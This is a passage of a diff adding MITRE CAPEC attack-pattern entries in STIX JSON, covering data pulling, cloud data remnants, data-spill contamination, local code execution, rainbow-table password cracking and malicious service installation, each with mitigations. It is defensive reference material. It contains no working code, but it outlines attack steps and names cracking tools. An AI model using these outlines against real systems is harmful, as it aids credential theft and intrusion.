This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.", + "external_references": [ + { + "external_id": "CAPEC-545", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/545.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1243", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1243.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1278", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1278.html" + }, + { + "external_id": "CWE-1323", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1323.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Credentials from Password Stores:Keychain", + "external_id": "T1555.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1555/001" + } + ], + "id": "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Pull Data from System Resources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + 
"x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.", + "external_references": [ + { + "external_id": "CAPEC-546", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/546.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "description": "Kopo M. Ramokapane, Awais Rashid, Jose M. 
Such, Assured Deletion in the Cloud: Requirements, Challenges and Future Directions, Association for Computing Machinery (ACM), Proceedings of the 2016 ACM on Cloud Computing Security Workshop", + "external_id": "REF-461", + "source_name": "reference_from_CAPEC", + "url": "https://nms.kcl.ac.uk/jose.such/pubs/Assured_deletion.pdf" + } + ], + "id": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Incomplete Data Deletion in a Multi-Tenant Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful attack that probes application memory will compromise the confidentiality of that data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The cloud provider must not assuredly delete part or all of the sensitive data for which they are responsible.The adversary must have the ability to interact with the system." + ], + "x_capec_skills_required": { + "Low": "The adversary requires the ability to traverse directory structure." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cloud providers should completely delete data to render it irrecoverable and inaccessible from any layer and component of infrastructure resources.", + "id": "course-of-action--65cd08b2-0269-4a7f-bdf4-e03d2d8374a3", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-546-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1ffd89f-d766-48a7-b7d3-8d46fe11517b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65cd08b2-0269-4a7f-bdf4-e03d2d8374a3", + "target_ref": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deletion of data should be completed promptly when requested.", + "id": "course-of-action--47ef1ed0-a199-4d71-86a7-db3c41ded30d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-546-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd548983-e701-4e46-9b7c-cfc9318fd925", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--47ef1ed0-a199-4d71-86a7-db3c41ded30d", + "target_ref": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary conducts a physical attack a device or component, destroying it such that it no longer functions as intended.", + "external_references": [ + { + "external_id": "CAPEC-547", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/547.html" + } + ], + "id": "attack-pattern--475af086-5223-4210-910a-5217445c0c23", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Physical Destruction of Device or Component", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary contaminates organizational information systems (including devices and networks) by causing them to handle information of a classification/sensitivity for which they have not been authorized. 
When this happens, the contaminated information system, device, or network must be brought offline to investigate and mitigate the data spill, which denies availability of the system until the investigation is complete.", + "external_references": [ + { + "external_id": "CAPEC-548", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/548.html" + }, + { + "description": "Florida Industrial Security Working Group (FISWG), Managing a “Data Spill”", + "external_id": "REF-742", + "source_name": "reference_from_CAPEC", + "url": "https://fiswg.research.ucf.edu/Documents/PPT/Manage%20a%20Data%20Spill-Contamination%20September%202015.pptx" + }, + { + "description": "data spillage", + "external_id": "REF-743", + "source_name": "reference_from_CAPEC", + "url": "https://csrc.nist.gov/glossary/term/data_spillage" + } + ], + "id": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Contaminate Resource", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Data Spill" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Read Data (Victims of the attack can be exposed to classified materials)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An insider threat was able to obtain a classified document. They have knowledge that a backend server which provides access to a website also runs a mail server. The adversary creates a throwaway email address and sends the classified document to the mail server. 
When an administrator checks the mail server they notice that it has processed an email with a classified document and the server has to be taken offline while they investigate the contamination. In the meantime, the website has to be taken down as well and access to the website is denied until the backend can be migrated to another server or the investigation is complete.\n " + ], + "x_capec_extended_description": "Contamination through email is a very common attack vector. Systems with email servers or personal work systems using email are susceptible to this attack simply by receiving an email that contains a classified document or information. A fake classified document could even be used that is mistaken as true classified material. This would still cause the system to be taken offline until the validity of the classified material is confirmed.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs to have real or fake classified/sensitive information to place on a system" + ], + "x_capec_skills_required": { + "High": "The ability to obtain a classified document or information", + "Low": "The ability to fake a classified document" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly safeguard classified/sensitive data. 
This includes training cleared individuals to ensure they are handling and disposing of this data properly, as well as ensuring systems only handle information of the classification level they are designed for.", + "id": "course-of-action--56f9ad78-5ec1-40cb-9b11-3691370aea5c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-548-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52919114-149c-439f-8afc-f504066b9c27", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--56f9ad78-5ec1-40cb-9b11-3691370aea5c", + "target_ref": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design systems with redundancy in mind. 
This could mean creating backing servers that could be switched over to in the event that a server has to be taken down for investigation.", + "id": "course-of-action--54cbddef-f017-46a0-9881-db189187b27c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-548-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d8503be-d28c-4932-a598-2ccce9d1e9fc", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--54cbddef-f017-46a0-9881-db189187b27c", + "target_ref": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a planned and efficient response plan to limit the amount of time a system is offline while the contamination is investigated.", + "id": "course-of-action--632c8db2-657e-4918-a5a6-0afd926f3fed", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-548-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a086aa4b-4a91-42df-9fa8-06cb87a76353", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--632c8db2-657e-4918-a5a6-0afd926f3fed", + "target_ref": 
"attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.", + "external_references": [ + { + "external_id": "CAPEC-549", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/549.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + } + ], + "id": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Local Execution of Code", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "BlueBorne refers to a set of nine vulnerabilities on different platforms (Linux, Windows, Android, iOS) 
that offer an adversary the ability to install and execute malicious code on a system if they were close in proximity to a Bluetooth enabled device. One vulnerability affecting iOS versions 7 through 9 allowed an attacker to overflow the Low Energy Audio Protocol since commands sent over this protocol are improperly validated and gain the elevated permissions of the Bluetooth stack. These vulnerabilities were a result of poor validation and were patched shortly after their exposure in 2017, but many non-updated devices remain vulnerable." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_prerequisites": [ + "Knowledge of the target system's vulnerabilities that can be capitalized on with malicious code.The adversary must be able to place the malicious code on the target system." + ], + "x_capec_resources_required": [ + "The means by which the adversary intends to place the malicious code on the system dictates the tools required. For example, suppose the adversary wishes to leverage social engineering and convince a legitimate user to open a malicious file attached to a seemingly legitimate email. 
In this case, the adversary might require a tool capable of wrapping malicious code into an innocuous filetype (e.g., PDF, .doc, etc.)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust cybersecurity training for all employees.", + "id": "course-of-action--48d83564-0b90-4cb8-8edc-629d4918b8d3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ad56f58-fb37-408f-8a1b-2e3dfa28a602", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--48d83564-0b90-4cb8-8edc-629d4918b8d3", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement system antivirus software that scans all attachments before opening them.", + "id": "course-of-action--bf8bf5fa-93a1-46a0-8d7c-6889986d5167", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b1a3ebf-0fe8-4635-a763-7180f98545ce", + "modified": "2021-06-24T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf8bf5fa-93a1-46a0-8d7c-6889986d5167", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regularly patch all software.", + "id": "course-of-action--6637d129-28e5-4beb-9e50-e0127d76b7ec", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--281bf316-0912-4859-9ffe-bb8474a7bad4", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6637d129-28e5-4beb-9e50-e0127d76b7ec", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Execute all suspicious files in a sandbox environment.", + "id": "course-of-action--d0e49c00-06b2-426e-a1dc-9aaeb4cafb97", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792", + 
"modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0e49c00-06b2-426e-a1dc-9aaeb4cafb97", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker gets access to the database table where hashes of passwords are stored. They then use a rainbow table of pre-computed hash chains to attempt to look up the original password. Once the original password corresponding to the hash is obtained, the attacker uses the original password to gain access to the system.", + "external_references": [ + { + "external_id": "CAPEC-55", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/55.html" + }, + { + "external_id": "CWE-261", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/261.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-916", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/916.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Cracking", + 
"external_id": "T1110.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/002" + } + ], + "id": "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Rainbow Table Password Cracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "BusyBox 1.1.1 does not use a salt when generating passwords, which makes it easier for local users to guess passwords from a stolen password file using techniques such as rainbow tables. See also: CVE-2006-1058" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application's/system's password policy: Determine the password policies of the target application/system.

  2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).
  3. Obtain password hashes: An attacker gets access to the database table storing hashes of passwords or potentially just discovers a hash of an individual password.

  4. Techniques
    Obtain copy of database table or flat file containing password hashes (by breaking access controls, using SQL Injection, etc.)
    Obtain password hashes from platform-specific storage locations (e.g. Windows registry)
    Sniff network packets containing password hashes.

Exploit

  1. Run rainbow table-based password cracking tool: An attacker finds or writes a password cracking tool that uses a previously computed rainbow table for the right hashing algorithm. It helps if the attacker knows what hashing algorithm was used by the password system.

  2. Techniques
    Run rainbow table-based password cracking tool such as Ophcrack or RainbowCrack. Reduction function must depend on application's/system's password policy.
", + "x_capec_extended_description": "\n A password rainbow table stores hash chains for various passwords. A password chain is computed, starting from the original password, P, via a reduce(compression) function R and a hash function H. A recurrence relation exists where Xi+1 = R(H(Xi)), X0 = P. Then the hash chain of length n for the original password P can be formed: X1, X2, X3, ... , Xn-2, Xn-1, Xn, H(Xn). P and H(Xn) are then stored together in the rainbow table. Constructing the rainbow tables takes a very long time and is computationally expensive. A separate table needs to be constructed for the various hash algorithms (e.g. SHA1, MD5, etc.). However, once a rainbow table is computed, it can be very effective in cracking the passwords that have been hashed without the use of salt.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Hash of the original password is available to the attacker. For a better chance of success, an attacker should have more than one hash of the original password, and ideally the whole table.", + "Salt was not used to create the hash of the original password. Otherwise the rainbow tables have to be re-computed, which is very expensive and will make the attack effectively infeasible (especially if salt was added in iterations).", + "The system uses one factor password based authentication." + ], + "x_capec_resources_required": [ + "Rainbow table of password hash chains with the right algorithm used. A password cracking tool that leverages this rainbow table will also be required. Hash(es) of the password is required." + ], + "x_capec_skills_required": { + "Low": "A variety of password cracking tools are available that can leverage a rainbow table. The more difficult part is to obtain the password hash(es) in the first place." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use salt when computing password hashes. That is, concatenate the salt (random bits) with the original password prior to hashing it.", + "id": "course-of-action--54756aa7-5cd0-4c09-90b0-4bcb64715e00", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-55-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--59fee1cf-5b04-404d-9ef4-ed4d63ce8317", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--54756aa7-5cd0-4c09-90b0-4bcb64715e00", + "target_ref": "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When an operating system starts, it also starts programs called services or daemons. Adversaries may install a new service which will be executed at startup (on a Windows system, by modifying the registry). The service name may be disguised by using a name from a related operating system or benign software. 
Services are usually run with elevated privileges.", + "external_references": [ + { + "external_id": "CAPEC-550", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/550.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Create or Modify System Process", + "external_id": "T1543", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543" + } + ], + "id": "attack-pattern--aef8e9e0-4714-4890-9470-06276c61abfd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Install New Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit privileges of user accounts so new service creation can only be performed by authorized administrators.", + "id": "course-of-action--ed7ccb18-f2f9-4895-b561-75c72e739be9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-550-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f2eb507a-dfa5-4dd3-8046-bcd8964aa9ec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed7ccb18-f2f9-4895-b561-75c72e739be9", + "target_ref": 
